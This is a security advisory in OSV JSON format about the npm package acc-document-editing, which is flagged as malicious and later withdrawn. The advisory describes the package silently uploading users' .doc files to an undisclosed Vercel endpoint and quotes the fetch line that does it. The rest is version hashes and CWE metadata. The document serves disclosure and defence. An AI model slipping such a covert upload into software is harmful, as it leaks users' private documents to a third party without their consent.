{"id":"MAL-2026-4474","summary":"Malicious code in acc-document-editing (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456)\nThe DocumentEditor React component exported by this package, when an end-user opens a.doc file, POSTs the raw file bytes to https://converter-apis.vercel.app/api/convert — a generic Vercel-hosted endpoint that is not OnlyOffice and is not disclosed in the package's README or API documentation. The README advertises a self-hosted OnlyOffice/X2T integration (X2T conversion runs locally in WASM), so integrators reasonably expect document content to stay on their own infrastructure. The.doc handling path in dist/index.cjs:565 (`fetch(\"https://converter-apis.vercel.app/api/convert\", { method: \"POST\", body: new Blob([arrayBuffer], { type: \"application/msword\" }) })`) silently relays end-user document bytes to the package author's chosen third-party endpoint with no consent UI, no documentation, and no configuration option to disable or redirect the upload. The destination is a generic free-tier Vercel hostname rather than an OnlyOffice domain, breaking the trust expectation of the advertised self-hosted editor. The postinstall script that copies static assets into the host project's public/ directory, and the child_process/fetch references inside the bundled X2T WASM toolchain, are documented and purpose-matched (X2T is the OnlyOffice document conversion tool); those are not the basis for the verdict.\n","modified":"2026-05-27T00:32:11.722623667Z","published":"2026-05-22T03:57:37Z","withdrawn":"2026-05-26T22:02:02Z","database_specific":{"malicious-packages-origins":[{"versions":["0.1.6"],"source":"amazon-inspector","modified_time":"2026-05-22T06:30:59Z","import_time":"2026-05-26T05:52:02.43010972Z","sha256":"300b0fa8657f3531b6990a1427fbf9883f27a012eb91ca6f515bda5c6695c63a","id":"IN-MAL-2026-004154"},{"versions":["0.1.1"],"source":"amazon-inspector","modified_time":"2026-05-22T03:57:37Z","import_time":"2026-05-26T05:51:59.95788369Z","sha256":"4dea118c9eb477ec5d4842309ad2d353632ef1b4bd7ceceabbee936c94ea19f1","id":"IN-MAL-2026-004132"},{"versions":["0.1.3"],"source":"amazon-inspector","modified_time":"2026-05-22T06:11:58Z","import_time":"2026-05-26T05:52:00.882790959Z","sha256":"7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456","id":"IN-MAL-2026-004140"},{"versions":["0.1.8"],"source":"amazon-inspector","modified_time":"2026-05-22T08:53:55Z","import_time":"2026-05-26T05:52:04.853595431Z","sha256":"9b4dff3f17804b520a1421d5ecca176d481a65930e32a46c1b1da4bb21194d06","id":"IN-MAL-2026-004174"},{"versions":["0.1.5"],"source":"amazon-inspector","modified_time":"2026-05-22T06:12:08Z","import_time":"2026-05-26T05:52:00.980238332Z","sha256":"b74b26220c2074eb335eba78c232af51f0eaf60f48c97056c4a47940cedd84c2","id":"IN-MAL-2026-004141"},{"versions":["0.1.4"],"source":"amazon-inspector","modified_time":"2026-05-22T06:17:06Z","import_time":"2026-05-26T05:52:01.771400206Z","sha256":"e5dc5175de5b1daead3a42da4e20d7297d2de0fb4864870d8a06011ff4271d05","id":"IN-MAL-2026-004148"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/acc-document-editing/v/0.1.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/acc-document-editing/v/0.1.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/acc-document-editing/v/0.1.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/acc-document-editing/v/0.1.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/acc-document-editing/v/0.1.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/acc-document-editing/v/0.1.4"}],"affected":[{"package":{"name":"acc-document-editing","ecosystem":"npm","purl":"pkg:npm/acc-document-editing"},"versions":["0.1.6","0.1.1","0.1.3","0.1.8","0.1.5","0.1.4"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"85770fdf802e36eb2ea61cfa774cbe37c6b1cb259e581050aab63ff036f778ef","path":"dist/index.js","tlsh":"4cb3eff60716bce54e3a2c40a50938441de93c1f6768c5acfe8c41e1bbd6552ef6acb8"}],"package_integrity":[{"filename":"acc-document-editing-0.1.6.tgz","hashes":{"sha1":"50a23de4337b743570d3724ba104e6485ac8a952","sha512_sri":"sha512-9Pw0Pwy36wEPwwMO2ZJtgz8Z/WL14JsWXd+G+LbCnpYSHGrsNXYC4QPxTZMnqF5UuArtzTZkzISNgDxeGhMeRg=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/acc-document-editing/MAL-2026-4474.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}